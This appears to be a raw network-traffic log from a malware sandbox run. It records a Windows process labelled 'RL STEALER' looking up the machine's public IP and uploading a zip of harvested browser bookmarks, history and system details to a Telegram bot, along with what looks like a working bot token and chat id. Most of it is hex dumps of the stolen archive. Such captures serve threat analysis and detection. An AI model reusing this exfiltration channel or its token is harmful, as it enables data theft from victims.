Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9fcfff727395b8d6c60ddb8e64f4c35a%5Cuser%40134349_en-
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 4f 47 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PKOGXBrowsers\Edge\PKq;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKq;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: 39 6a e3 ea 08 11 66 35 c1 fa 65 4b 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 Data Ascii: 9jf5eKk0_g=Vbj4\|`@+t,H~!WXRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC\|Wm<{^-};XQTKoJJ{_;P
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: c1 2b d3 be ce 64 71 56 ee 17 37 ec 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 Data Ascii: +dqV7fn=Smxh\|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: ca 06 3d b4 7a 1a b5 6b 5e 95 c8 90 df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 Data Ascii: =zk^uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: 67 3a f5 ef 75 12 7f ae e5 9d e7 d0 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc Data Ascii: g:u\|6,?.zgmo&x?e?>h@v.Hn\|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: 9b 29 7e e9 f0 ea e9 9f 34 d9 e8 0b e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55 Data Ascii: )~4;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK)Ki>YlB.5+5hnciF!&\|fFtv[O(xeUPQdkCARB"u!v{kMj\|f7}Q]U
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: 24 87 50 69 69 a4 a4 53 11 69 a4 4b a4 44 3a 04 a4 7b e6 9d 99 01 7f fe ff f7 ae 7b d7 7a 6f bd fb d6 7a 6b 31 ac 39 73 ce d9 fb c4 de df da 7b 7f 3f 3b 44 35 4b 7a ce ea b0 db df 0b 52 36 75 5f 52 1b e0 ab 0a 1e 68 fb bc 43 bd f3 9d 40 05 97 ff 2a a3 35 fb 5d 64 11 c7 eb 46 08 6f a0 a1 a4 fd 64 22 44 50 98 35 6b b0 3d 16 53 a5 aa 8f 1f 15 9c a1 91 a2 df 92 b3 74 05 c6 54 67 56 1e d8 a5 7d 81 6f 0c 5f c4 db 46 f1 4b 05 fe a8 74 cc 57 e9 aa 2a 46 be b6 0f de 83 6b 81 9d 3a 1f 07 6c 1f 7c a9 ef b3 ec 9c 59 97 23 44 d0 d9 e1 c1 66 c2 3e d5 bd c9 79 ca 67 4e 43 98 24 5f c9 b5 93 96 5c b2 ef 55 54 ea eb 1b e2 53 d6 79 8f 55 79 d3 4d c4 04 99 5c 0d 3a 02 d6 ac 47 3b 1f d0 c0 e7 3a 54 73 51 2d 0c 0d dc 14 40 03 05 8c fb 65 96 ab 75 a8 b9 7c 34 80 2c 4b 9c 52 dd Data Ascii: $PiiSiKD:{{zozk19s{?;D5KzR6u_RhC@5]dFod"DP5k=StTgV}o_FKtWFk:l\|Y#Df>ygNC$_\UTSyUyM\:G;:TsQ-@eu\|4,KR
2024-07-06 11:28:49 UTC	16355	OUT	Data Raw: 6a ba 2b fc d7 27 23 34 c0 f8 f5 cb ea 78 78 d4 e1 fe 78 b7 92 6b 96 ed 63 62 a8 7a bd a8 db dd f5 ee f3 76 08 e8 c5 d0 00 be 4b 2a 65 32 f2 c1 66 8a 55 16 36 81 8c 63 0a 40 cc b0 9f ff a8 5d 8f 3b 01 7d a2 fb 4e de 9d 92 3a 61 3b bc ba 97 29 7d 26 3c e9 8f 17 44 27 19 42 2e 66 f9 6f 24 3f 0e 8b 7e 6e 9a af cb e8 e6 2c a7 fd 48 f0 c9 45 85 04 0b e2 fe 00 c8 60 5b a7 bd 1b 81 cd 6d eb 8a 97 4e fc 4d 37 8c e7 8a df b4 2a 1f 7a 10 3c d9 0f c6 23 f5 f7 0f 63 f7 3a cb fd a8 aa 48 bb fa 63 ec 38 61 47 63 fa ef 0b 01 41 32 f6 26 2d 7b 45 48 a7 d6 c5 26 7c 61 3d 9b 36 3a 33 82 ea 1c d7 91 94 04 3b c1 2e e2 9c cf 12 31 8e 43 bf ad 7b 74 f5 6b 2f 79 ee 3a 59 6d bc 25 5c ed 20 fc cc dd 45 1b 24 1a 39 2a b6 a9 35 5d 8a fc a7 24 d6 a3 0c d2 c7 91 61 a1 4e 3a 60 4b c5 Data Ascii: j+'#4xxxkcbzvKe2fU6c@];}N:a;)}&<D'B.fo$?~n,HE`[mNM7z<#c:Hc8aGcA2&-{EH&\|a=6:3;.1C{tk/y:Ym%\ E$9*5]$aN:`K
2024-07-06 11:28:49 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:49 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49926	104.26.13.205	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:29:02 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-06 11:29:02 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:02 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89ef4136e92b4373-EWR
2024-07-06 11:29:02 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49931	104.26.13.205	443

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:29:04 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-06 11:29:04 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:04 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89ef4142fca64366-EWR
2024-07-06 11:29:04 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49937	104.26.13.205	443

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:29:06 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-06 11:29:06 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:06 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89ef41504cb09e05-EWR
2024-07-06 11:29:06 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49938	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:29:07 UTC	1518	OUT	POST /bot7347450494:AAG6CMHwBd3FeRdexRASKIMPj2MuZf6S2dw/sendDocument?chat_id=212019462&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:28%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97% [TRUNCATED] Content-Type: multipart/form-data; boundary=------------------------8dc9e6ac9ab89e3 Host: api.telegram.org Content-Length: 672709 Expect: 100-continue Connection: Keep-Alive
2024-07-06 11:29:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 36 61 63 39 61 62 38 39 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 31 33 34 33 34 39 5c 40 5b 55 6e 69 74 65 64 20 53 74 61 74 65 73 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 4b 03 04 2d 00 01 00 08 00 a1 3b e6 58 a5 a6 7d 01 ff ff ff ff ff ff ff ff 0f 00 38 00 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 74 Data Ascii: --------------------------8dc9e6ac9ab89e3Content-Disposition: form-data; name="document"; filename="C:\Users\user\AppData\Roaming\134349\@[United States].zip"Content-Type: application/x-ms-dos-executablePK-;X}8Information.t
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: 01 6e ec 85 6b 78 92 f5 04 bd e4 56 fe 58 30 fc 55 92 97 27 05 bb 8a 21 2f 0e 0c d5 77 b6 9f 32 8c 70 b9 06 1b d9 81 b8 96 3a d8 fe 5d 33 9a c2 f5 d9 bc 2b 9a 7f 7d 66 52 0f 74 b7 94 5c 92 6a 94 0b 2c 78 85 27 6a d4 8e f5 0e e9 58 4f a3 0e 14 46 73 9a 16 7a 0d e9 f3 61 2b 0c 1f 58 9e 1d 4f e1 27 51 36 1f bd ce 83 86 57 e3 c4 2e 53 62 1b ee b9 07 e0 08 3f 03 0c 47 e6 52 4a 6d 6c 9a 30 b1 39 d3 79 44 b5 f0 ef 51 a8 3c 37 2d 88 d8 0b 06 fb 33 c4 a9 e4 97 91 9c fb 4e a0 4a 68 d0 11 34 0f 74 99 fa f8 d0 62 fb fa 06 6d b5 68 9e 2e b7 18 eb f8 66 49 03 39 b2 69 54 2a ff 0d f7 f5 99 c5 ae 37 e4 2c 83 bb ad 9c f6 9d 38 ca 73 54 db 98 b1 fb 20 10 a8 19 06 b4 02 42 b6 0b bd 86 2f 54 e0 44 a1 1c 52 b4 ed 4d da 9f 49 fd f5 82 b5 83 1d bf 8b 69 be ed 3c 2e f0 ae 12 a0 Data Ascii: nkxVX0U'!/w2p:]3+}fRt\j,x'jXOFsza+XO'Q6W.Sb?GRJml09yDQ<7-3NJh4tbmh.fI9iT*7,8sT B/TDRMIi<.
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: ca 7a f5 18 6e 51 6e 44 ec c3 09 93 c3 11 bb e5 fe c0 75 ac c3 a0 20 27 cb da 71 7d 3c 6f 18 05 a2 d3 25 56 88 2b 06 d8 2f 50 59 fc 3a a1 9c 59 6d b1 bf 14 6b bf 85 08 0b 6d 72 d0 88 63 42 b0 53 aa 8b e1 eb cc 7a b8 b7 af f9 ee 0e 49 19 f6 5e 70 9e bf fb ea 92 e3 f4 20 9e 9c a9 62 65 e5 6b 5f d4 c4 6a 71 ce 0c 09 7a 30 71 e5 a0 cb dc cb 87 af 6d 5d 7a e9 58 cc 96 c3 57 11 02 dd eb ce 77 24 78 e4 85 4d 2b c2 52 81 0f 5f ee 6d 17 eb f7 a4 28 2e 7a 1f a1 de 7f b3 d5 6e ad c6 42 f2 62 2c 12 02 ee fd 87 fd 61 02 5e 74 3a c7 0e 3f 54 81 0f 5d c5 3c 2d bd 37 1a 95 42 34 44 fb b3 59 37 23 3d d7 df a7 23 b1 12 07 18 11 6a 1b 75 d4 a9 b4 d2 7e 77 d6 23 25 57 f5 1c f9 dd 22 47 9c bc ae bf 80 ac 9d 5e 5e ab 25 12 64 90 e4 9c 8f 51 ca 74 71 b5 fd 27 7b 7d 07 7a f6 5a Data Ascii: znQnDu 'q}<o%V+/PY:YmkmrcBSzI^p bek_jqz0qm]zXWw$xM+R_m(.znBb,a^t:?T]<-7B4DY7#=#ju~w#%W"G^^%dQtq'{}zZ
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: 64 56 9a 30 b8 15 7a d1 9b b9 1e c2 01 00 b2 f1 2d 17 fa a3 45 90 81 b4 4f 33 70 52 62 b3 53 47 c8 61 ee 59 6f f7 f9 59 85 8c 88 e4 69 6d 32 9e 0d c3 aa 3d 2d 93 d6 74 dd a8 fb 12 6c d2 70 64 72 35 32 60 27 44 cc 2f 51 6f 7a cd da a0 15 c7 70 c0 06 88 7e e7 9f 26 96 1f 60 df 59 c4 c3 ad aa a5 d3 95 25 57 3f 9a ec cf 01 69 f0 16 ef da 84 1d 77 fc 23 28 96 cb d0 7c 20 3d e4 07 6f 9b df de 2d 14 7b d5 10 98 6d 08 97 38 c0 36 24 8f b4 04 40 d3 5d 79 f9 21 f3 0b 28 a6 d5 38 8c ef 52 5c e2 96 2e c3 53 e4 6c 18 b9 b7 5f 4e 18 04 5c 71 5a c3 2e e8 df 76 37 19 10 e6 02 4a dc a8 d6 56 7b 2e ac 51 a3 77 93 6a 01 a9 5e b3 bd 1d bd 84 f1 12 8f 41 8c b5 8a 30 f2 6d 6f b1 70 e7 d5 8d 5c ef 29 5b e0 d4 d1 c8 26 cd 7b b7 3f 54 b3 b3 8e 96 79 5b 11 88 bb 75 8c f2 96 b7 20 Data Ascii: dV0z-EO3pRbSGaYoYim2=-tlpdr52`'D/Qozp~&`Y%W?iw#(\| =o-{m86$@]y!(8R\.Sl_N\qZ.v7JV{.Qwj^A0mop\)[&{?Ty[u
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: 4f 3a 53 56 62 a3 58 95 56 31 a0 ec e5 ee 9f 26 0c d0 7f e5 78 6d be 88 e4 79 92 51 82 2d d3 94 eb 7d 17 fb e5 bf c3 09 21 a5 19 05 95 e5 05 2f fe db 84 a4 76 e1 d8 fb 1c 8a 12 0e e9 82 8d a7 72 97 26 f7 a3 23 28 11 ef 73 04 3f 73 d5 19 e1 63 ed 12 9e cb 79 fa 74 1f 10 07 4f 32 03 0e 40 d6 b3 8f 5b 41 21 a2 a4 59 1b bb a9 83 65 c5 4d f2 3d 0f 33 37 40 84 4e 0a 7d 65 bf 7e 19 bb 69 a7 3f b8 0b ee 01 1d de bb 51 d1 b7 09 60 46 eb d8 f3 d3 80 6d e8 7a 7c bb 8b a0 1c 79 75 fd de 57 08 b5 02 27 8b 1a 6c e2 ed 05 58 dd a1 1f 0b b0 cb cf 7b 18 03 7e 22 aa 4b 9a 17 f6 32 47 8a 8e 93 e9 13 85 25 95 0a d6 ef a2 74 89 81 98 85 79 08 69 81 17 05 6f d1 6a ae 67 3f 30 68 61 88 5a 27 4e e1 72 73 00 64 f6 f8 ac 00 9e 2b 4d a0 08 eb 85 79 c0 42 0c 23 d1 fc a8 2a 15 8e f0 Data Ascii: O:SVbXV1&xmyQ-}!/vr&#(s?scytO2@[A!YeM=37@N}e~i?Q`Fmz\|yuW'lX{~"K2G%tyiojg?0haZ'Nrsd+MyB#*
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: 1a 84 95 38 0a 58 a7 87 6d 1e 77 2f 88 2e b6 a1 51 98 c1 2e fd e8 4b 39 e4 08 d0 dd 98 cb ab 8b 2b 0a 74 f6 eb 5b fe c3 7f c1 20 c6 c2 f4 37 51 5b bb ca e0 da 16 81 a9 86 a8 e1 af 52 f1 4a 2c 86 ee ec dd 53 94 14 c2 46 1e da 41 ec bc a7 f0 d4 3d a0 f0 5a 74 35 15 33 77 b5 67 a6 23 49 09 43 05 2f 38 20 e0 68 61 a9 e5 25 0d 23 75 dd b5 5c fb fb 5d ac 8d e9 df 5f e1 79 17 17 35 35 c5 da c1 29 b3 ad ec e5 ca 5a 0c 04 7c 4b 2c 7f 9f 1d b4 f1 78 93 04 b6 99 4f 4c a9 5b 0b 22 e9 03 20 0b 9d 3a c5 d4 1e ab 9e de 0b 7c e9 0d 00 16 73 89 16 ed a4 49 03 29 2f 11 74 2e ed 17 6a 92 16 62 e3 a5 d6 c1 31 d6 f4 3f 0a 6c ce 9a d3 93 db fb b7 59 4e f8 9b ad 49 1d b6 06 d5 d5 0d ca 4d b1 76 40 bc 82 45 6d 7a b6 81 83 e8 b7 35 0e 76 2c 30 6f 71 80 db 56 a0 45 8f 3e d1 a0 f4 Data Ascii: 8Xmw/.Q.K9+t[ 7Q[RJ,SFA=Zt53wg#IC/8 ha%#u\]_y55)Z\|K,xOL[" :\|sI)/t.jb1?lYNIMv@Emz5v,0oqVE>
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: 91 36 4a 0e d7 8a d0 9a a5 5a 6f 96 a2 bd f4 72 34 75 9f 7e f7 a9 b5 87 12 f7 f0 2a ec 22 68 2d 6e 92 9f 9d 3e 3a 98 c2 47 79 4e f5 03 d2 50 6a a2 d6 90 c6 7b eb 2a 8c c1 2f 85 e9 ee 4e c3 17 a7 48 1d 9c 76 8d a1 fa 6f 9d ab a4 a7 74 2a 8a df 7f dd 9d 56 a7 05 38 bb 19 4a 12 b2 f8 06 91 8d a3 15 24 08 99 4c 7f a8 3b 42 b8 fa 5b 29 67 ab 88 8b 11 6f 71 7b e6 0e e5 36 91 3c 73 71 13 f4 0b a4 b5 b8 f9 2c d1 51 f8 8a 50 31 57 72 9c 08 cc 33 cf a0 56 0e 51 83 d3 a9 70 69 d9 40 9f fe 89 6a c2 0b 93 95 af 18 f3 5a 72 51 25 f5 5b 35 ee 8d f9 db 3f 05 96 47 08 3e c5 5a 0a 3c 1c 39 fb ce da 4f 7b 42 07 ce af a7 c7 90 1b ac 7f f7 2f ef 69 f9 a8 c2 3c 98 c3 b1 fc 78 e6 ce 51 ff c3 5e 3f 43 fe 43 5a 41 0a 5d c8 b2 08 eb e4 b6 06 d5 8b b9 40 4a 87 af ac d4 d7 49 da f9 Data Ascii: 6JZor4u~"h-n>:GyNPj{/NHvot*V8J$L;B[)goq{6<sq,QP1Wr3VQpi@jZrQ%[5?G>Z<9O{B/i<xQ^?CCZA]@JI
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: 8b df 2a 5c d2 ae 93 5e 65 c4 26 ec 7f 4a ac 35 87 23 d0 b6 5f b7 6e a6 48 e9 bd 06 15 0e 21 62 ca aa 5c 54 4e b4 65 4c cc b5 9a 0f e3 3b 08 c7 b5 15 d8 d0 af 44 ab 3d a9 22 ac aa 3a 0e 34 07 d0 dc 6a 99 82 4b af 14 6b b0 ff 62 3e 24 4a db f3 87 ca ea 51 5c 76 62 95 fe 26 a9 44 0b 4e 4e 10 56 22 80 ac 5e e4 d8 71 9d e9 bd 1a 13 57 e1 2b 5e 01 e3 39 ab 65 31 76 d1 93 68 29 7d 3d 92 db 91 79 27 97 38 f3 c2 a4 87 52 95 cc 10 c2 60 46 4a b1 2b 5c 1d 16 65 0a 6a 1a 4e 19 1c 17 3c d1 fd 39 15 8d 4d 65 93 8e b7 29 5d 3d 1f 93 c9 a8 20 54 d6 03 0b d3 28 9d cc 45 70 4a e0 c9 fe ed 31 3c 8a be 46 7f 2d 17 d4 48 8f fe fe 1e f5 c7 41 fa c4 86 9f 57 b8 fd 8d 00 0c 6b b1 ca cf 5a 79 20 25 ac a0 56 a1 c7 92 f1 df d0 4e 66 1d db b9 92 a6 cb c1 c1 fc 5d 64 ab 75 ea fc 32 Data Ascii: *\^e&J5#_nH!b\TNeL;D=":4jKkb>$JQ\vb&DNNV"^qW+^9e1vh)}=y'8R`FJ+\ejN<9Me)]= T(EpJ1<F-HAWkZy %VNf]du2
2024-07-06 11:29:07 UTC	16355	OUT	Data Raw: e4 a6 69 5f 13 92 64 fc 11 d1 a7 bf a8 8e b3 a9 0c cf c9 ea 22 22 77 20 f3 1d 0e 37 6a 24 8d 68 3e 2c fd 14 29 6f 90 8c f5 07 9a b3 cd 2f 0a 54 55 fb 32 0e be a7 fa 8d ea d1 71 64 c1 8e a9 5f 6c 1d c8 b9 d0 82 90 b5 17 94 59 12 9f 95 0f 13 81 7d fa 96 95 0d b7 ab 78 90 1e 60 94 11 b2 02 9b fe a3 b8 9b 26 43 74 15 82 72 f4 60 fe 65 01 d5 f8 c5 1e da ff ab de 58 35 14 30 96 f1 07 20 c5 84 9e b4 99 29 5a 2d 2a b0 fa 50 2d 74 42 48 07 2f d7 3a 33 95 78 76 73 f5 4c e2 36 0f 70 8d 41 5a 5d cb 68 f4 45 5d 6c f0 ba 0c 3b 32 e7 5e af 7f ff b9 41 d6 4c bb cb 7c d5 5c 17 43 4a a7 53 3d cc 34 50 65 55 6e 61 58 cc cb e5 